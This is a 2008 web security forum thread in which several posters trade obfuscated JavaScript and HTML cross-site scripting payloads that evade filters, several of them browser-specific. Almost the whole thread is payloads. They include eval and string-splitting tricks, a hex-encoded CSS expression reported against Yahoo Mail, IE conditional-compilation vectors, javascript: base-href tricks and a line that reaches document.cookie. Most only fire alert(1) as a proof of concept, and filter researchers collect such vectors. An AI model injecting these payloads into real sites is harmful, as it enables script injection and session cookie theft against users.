Just more easy functions:

with(b={})if((b.c=function(){return'ale'})&&(b.a=function(){return'rt'}))eval(b.c()+b.a())(0);

a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1),a(0)

Tell me if one of them doesn't work :S

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

<div style=background:url('http://mail.yahoo.com/'logo.jpg;x:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29;'xxx:xx');></div>

this maybe bypass some filter, yahoo!mail has patched already:)

I totally forgot about this one until I rediscovered on a shirt of one of the characters of http://www.kyoisawesome.com

<script>/*</script*>*/alert('XSS')</script>

hehe comics with xss t-shirts nice!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

J. Harrison Christ - what's that?

wow, I can imagine the latter one to pass some filters. Is it IE 7 compatible?

This should definitely be added to the sheet

IE 6/7/8 compatible :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

e=<a>ev<b></b>al</a>
delete e.b;
a=<test>al<!---->ert(1)</test>
this[e](a+[])

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

delete [a=alert],delete a(1)

AND

delete~[a=alert]/delete a(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/21/2008 02:49PM by Gareth Heyes.

Gareth Heyes Wrote:
-------------------------------------------------------
> delete ,delete a(1)
>
> AND
>
> delete~/delete a(1)

[_=alert,__=document.cookie]&delete-_(__)

:)



Edited 3 time(s). Last edit at 09/21/2008 04:08PM by Spyware.

hehe js is weird :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

http://www.thespanner.co.uk/2008/10/01/to-infinity-and-beyond/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

From my twitter page:-

IE only :-
""@cc_on/alert(1)

@cc_on@_win32/alert(1)

document.createStyleSheet('http://businessinfo.co.uk/labs/xss/xss.css')

Firefox only:-
<_ />/<_ />+~~~~~~<_{alert(1)} />

location=1&&<b>javascript:ale<?process x="true"?>rt(1)</b>

<script><script><script><script>{alert(/Why? hehe/)}</script></script></script></script>

Cross browser:-
Function('\falert\u2029(1)')()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/26/2008 05:34PM by Gareth Heyes.

And yeah this is valid IE javascript :D

@cc_on@_ok_would_you_like_an_alert
@cc_off@cc_on
~@_very_well?alert(1):@_there_you_go

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

//IE only again
@cc_on@set@_=5e-324@_?alert(@set@alert=1@alert):@_

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

cool Gareth! It took me a while to fully parse that. I like how blank spaces are not needed between statements.

nice stuff indeed :)

@if(@_mc680x0)@else alert(@_jscript_version)@end

Yep pretty handy,notice how you can embed directly next to quotes as well.

""@cc_on,x=@anything 'something'@anything

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Oooopps slight mistake lol

""@cc_on,x=@cc_on'something'@cc_on

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

/*@cc_on@set @x=1@*/@cc_on alert(@x)

hehe this one is awesome:-

/*@cc_on@set@x=88@set@ss=83@set@s=83@*/@cc_on alert(String.fromCharCode(@x,@s,@ss))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Although Firefox doesn't support conditional comments....

alert(1)/@works_in_ff

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

document.designMode=/On/[-1]
document.body.innerHTML=name location=name

Edited 1 time(s). Last edit at 10/30/2008 05:36PM by .mario.

eval('ale'+/............../.__proto__[-1]+'rt(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

execScript('Dim a(1)\na(0)="ale"','vbscript');
x=new VBArray(a);
eval(x.toArray().join('')+'rt(1)');

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

eval((function ale(){}).name+(function rt(){}).name+'(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

if(false);else~alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

if(false)sdfasdfsad(),dasfasdfsfd,fasdfsdfs();else alert(1);

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

The nice trick i've found by myself (it seems to be first-time publishing =)):

<base href='javascript:'>
<img src='alert("w00f");'>


For IE 6.0 and Opera < 9.52

[[url=http://brainpillow.cc]y3t an0ther unstarted h0me blog..[/url]]

Works on IE7 :)

<html>
<head>
<base href='javascript:'>
</head>
<body>
<iframe src='alert("w00f");'>
</body>
</html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

for (i in a={}.__proto__.__proto__+'')
  with (Math) a=a.replace(a,String.fromCharCode(a.charCodeAt(i)+-9+36*i+-33.5*pow(i,2)+7.5*pow(i,3)));

with (a) self[valueOf()](charAt(2)+charAt(3)+charAt(0)+'rt(1)');

Nothing earth shattering, but pretty fun nonetheless :) Sorry it's been so long! Hopefully I'll post some more soon.
By the way, nice find, brainpillow!

-Dan